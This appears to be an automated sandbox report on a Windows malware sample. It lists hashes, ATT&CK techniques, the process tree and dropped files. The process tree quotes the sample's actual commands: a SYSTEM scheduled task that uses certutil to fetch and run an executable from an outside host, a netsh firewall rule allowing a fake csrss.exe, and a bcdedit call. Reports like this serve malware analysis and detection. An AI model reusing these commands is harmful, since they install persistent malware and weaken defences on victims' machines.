7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f

Analysis

max time kernel
31s
max time network
150s
platform
windows7_x64
resource
win7-20220414-en
submitted
23-05-2022 21:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe
Size

3.7MB
MD5

1d719361bc2a069c28e029f773a81028
SHA1

65cdf57a917c28147d1a9996e508a86bbdec4e50
SHA256

7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f
SHA512

38df046bb5b59f48bb58a14feed7826aeb7e480571c7f4f576192233d2c69dfc055db46e8d42649ff7d8e257c6706d4db8bb786600969e3cd6d091ec969174e9

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1732 bcdedit.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1368 schtasks.exe
848 schtasks.exe

pid	process
1732	bcdedit.exe

pid	process
1368	schtasks.exe
848	schtasks.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe

pid	process
1436	7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe
1148	7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe

description	pid	process
Token: SeDebugPrivilege	1436	7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe
Token: SeImpersonatePrivilege	1436	7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.execmd.exe

description	pid	process	target process
PID 1148 wrote to memory of 392	1148	7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe	cmd.exe
PID 1148 wrote to memory of 392	1148	7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe	cmd.exe
PID 1148 wrote to memory of 392	1148	7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe	cmd.exe
PID 1148 wrote to memory of 392	1148	7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe	cmd.exe
PID 392 wrote to memory of 852	392	cmd.exe	netsh.exe
PID 392 wrote to memory of 852	392	cmd.exe	netsh.exe
PID 392 wrote to memory of 852	392	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe
"C:\Users\Admin\AppData\Local\Temp\7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Users\Admin\AppData\Local\Temp\7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe
"C:\Users\Admin\AppData\Local\Temp\7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:616

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1368

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:848

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:756

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:1732

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220523231356.log C:\Windows\Logs\CBS\CbsPersist_20220523231356.cab
1⤵
PID:1496

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies data under HKEY_USERS
PID:852

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
412KB

MD5
2402bfd47adecc82fa4fe917fa3daf40

SHA1
9866d69ad7991e6d0d52d7e3c74500e205d1847c

SHA256
dbe5927fab8568631647220d9aebfcecd74e6820e51ce773668b6da0cf075f05

SHA512
43d41d46fd586ab09a1a947ed3d687fd5773a9c4060c7df682cc1fcf13e2fcbc792002a10091840054d0e9b9b2dd1a045f3f7fadf628674b440a444fd81746f8

Download Submit
C:\Windows\rss\csrss.exe
Filesize
665KB

MD5
bfd91c02ae6933bcf18be1f56d379869

SHA1
b5e9a66a2e6e9b3a4fdba4257d89cb80d65ab3fa

SHA256
cfb8da4e8fdfb30084b75085e29d8918d9f25797e10c2ab7faa0fd27d035dee8

SHA512
8d6769d0929166448577b4005bc023d35991ae4d77f6f2630dd01c8b5c0fd3f0f7e575741db820901f826848fe796d988527b1f7668e0665a9cbe58b4a9ecb79

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
397KB

MD5
38c86a09020e197763831fa993ccb6e5

SHA1
4fbc28d01af9a1e6d170c043f44de940a2bf2694

SHA256
f5c1687acb535bac187e5811941683eaeeb7949bfd1fd8f2972ec71fc14e7845

SHA512
45f7dfb03abede84a33cc5b2ac72b76db7aa5564a56eba7ba5a23841fd1f662962e0d202e1a779ebfb08d1b83b2151c51f986f1a1fd1bf53a415540603947b97

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
341KB

MD5
bb12797c6dfa018b6e56790756a346e1

SHA1
fc09e79d31e6ba8ce0ad16de06dfb0e4bdb820d4

SHA256
a9cbf271d74c2876321434f96b3d33731c7046403c26e1511b1f44b75c195bc3

SHA512
e180500914712f190e5a1e82f22c6895f80ba54bf80b0a627169f703be4e5932adbfddd856de6c4b809a4a4142978f49d49aafb7edc4e70460a4c6511a3d5a5a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
412KB

MD5
3af533705c7378c2917cd3d72bf9eb84

SHA1
67ac1021fdba41ae79a0006ec4ad731632fa616f

SHA256
0e4b040e3601effba0ee9a5cb0385380e387cc8328ec0710724f354f3caafb0e

SHA512
91c4d5ed036f24933424d820c31beb78bb39334e4d4b2763fde204dfba3ae647f724963534a1d6699d5d9d8bfa8c1333b9b92f6de7c67de9173ac27813b501fd

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
453KB

MD5
b6120a1e192bd237e2a3c1c351732fcc

SHA1
20d38cc3fcd4f24861d478947d6f1694bc962aa4

SHA256
f215d7fc119fcb69b98dbe53ec4294a5366562ade1620bd6a39499f0c86686c1

SHA512
9b5af6e4c8923803787191e1b0a854bdb5442a66a982e1c3178e27f0e10e21961c5623e978d9697524b15490cd6abddce2c67dd8de7855bec8ddbbdf960a80a5

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
387KB

MD5
ed3afb5700669f082a5779e0cc11f1ea

SHA1
afaae966cd9b9b3f722d156e5202dc234a827227

SHA256
5e8336ead3dd28d4057c11cf949e3bd1d64794c93957c13610ec28fab4209984

SHA512
64135803eaa15ec42e95b26d08887487da129fde1e2d9f322ccacfbf48daa3242fdbd68b6f49320b524800c3e66fea4184b5ef2ccb88d6d336f35a889f6241ef

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
502KB

MD5
69fbe418c93daa2182f56d18d306e147

SHA1
477a4bd05357d62a2437886d47f58540673d09b2

SHA256
27772f6101a3c8aeea36805da90ef12167e239f75460ff2a4d86c8ff34cca308

SHA512
e35d8bd91848bb83d241b47fa9a0adb5465b93799ae762c925afa4fd13b557453f1b29a871f115dab9c341f22a3f8531815fe32db9f15ae16c5cd5a5d17d0fe5

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
493KB

MD5
445a271d472b70f573076b4b2b894f7b

SHA1
b7fd06107a8c4311ce0e7924d87c68f663bb332c

SHA256
7f7bab73fe7c1854b5ccb3c98b172291d81a51610ab3108cfd556ef5ab81bc7b

SHA512
30dcaa5134d69ed8c77d35b3acb0e199dbd5e0480dcbbd1a868bc9da02921463ea54351fcd17359fea9ef302a037518b6a09ebd5a68b4f146eb28413b16a03cd

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
288KB

MD5
dba0b5dbe26b9074b831c8f46097c792

SHA1
0f13913efd736dd3418f301ecf2fa5279234b3b3

SHA256
4da2802f991c67bfb3a10a91bb4debe6efa985878112e73dceba3eba7fd90767

SHA512
3eb4ab9cadfdafa330a8971d19c149d6e98455897e021a8d98eb5f66ec4a777f0a2e64ed881446b5a95d8b89e058948ed172146b4d703893d522a38fcccbfebf

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
333KB

MD5
7d60c28359c06de0d36ae9a59927d877

SHA1
82cd15437a1bf5e1432397d072464693548d442a

SHA256
d2cf8085c7b0f04afa464d6de893df4396c6f5f717fcb1fbe72a0ac0ca0bb165

SHA512
b96c0ef2b00d8f07b04848b392079d08520165d38d86206027f97cfebba42ad97b5b23423d2ddc28222751ac123725304c8f4803eeebd17d00df506b35cc77fc

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
342KB

MD5
2a5ca547acbc2ab4f4509f058a3f85ae

SHA1
59f4ac940c63b97fb64b05247cb33dfce81d1897

SHA256
497d3d38acb4e80a383ffb89eb6044d3a14499b47a28c1e86b82f4963b589b53

SHA512
6c61734f6ea609c4b03a04c2a536c6885202236be0af12fee896a8dc0a68cdc3bfb777f3ed6419a31dfaf8d4245df969d3b450f14b4c495879d889ecbd7e623d

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
561KB

MD5
4c7f9ad853dfc9b8d5ad78475c175a21

SHA1
78e270f729cfcd627597b5bc85d93d93c51cfc45

SHA256
05c19242572dd4c166e7e191f33a0bbca980a50a915d9a57eda0cbd8b014a933

SHA512
98386c32397127ef83fc9a8b2d105c74bb9c1a4c63c413cb9e9b243080165179f028c9a2248281a1c27028ad79aa69397a3d51a7f1993a5f9b3bc15c40ad01ab

Download Submit
\Windows\rss\csrss.exe
Filesize
458KB

MD5
9ed691008cf6052809bda2222d0ff5dc

SHA1
10ee7f85b66e3c9e5e8d291658957433e97601c5

SHA256
84003bcf107559e41921cb33da58a786aa16586cbebfe93a3afb34a0e9ca9bc5

SHA512
b607633c5cf62ea65020fbac4801c4c573abbc3e07cb7675e6f0096bbe5ab1ace1c78d929039f6127b0607b331184ab50fab8a445551fc481f5307c7478fc43a

Download Submit
memory/392-59-0x0000000000000000-mapping.dmp

Download
memory/616-68-0x0000000000E00000-0x00000000011A6000-memory.dmp

Filesize
3.6MB

Download
memory/616-66-0x0000000000000000-mapping.dmp

Download
memory/616-69-0x0000000000E00000-0x00000000011A6000-memory.dmp

Filesize
3.6MB

Download
memory/616-70-0x0000000000400000-0x0000000000BF1000-memory.dmp

Filesize
7.9MB

Download
memory/852-61-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

Filesize
8KB

Download
memory/852-60-0x0000000000000000-mapping.dmp

Download
memory/1148-63-0x0000000000400000-0x0000000000BF1000-memory.dmp

Filesize
7.9MB

Download
memory/1148-62-0x0000000000F80000-0x0000000001326000-memory.dmp

Filesize
3.6MB

Download
memory/1148-58-0x0000000000F80000-0x0000000001326000-memory.dmp

Filesize
3.6MB

Download
memory/1436-54-0x0000000001020000-0x00000000013C6000-memory.dmp

Filesize
3.6MB

Download
memory/1436-57-0x0000000000400000-0x0000000000BF1000-memory.dmp

Filesize
7.9MB

Download
memory/1436-56-0x00000000013D0000-0x0000000001AC5000-memory.dmp

Filesize
7.0MB

Download
memory/1436-55-0x0000000001020000-0x00000000013C6000-memory.dmp

Filesize
3.6MB

Download
memory/1732-84-0x0000000000000000-mapping.dmp

Download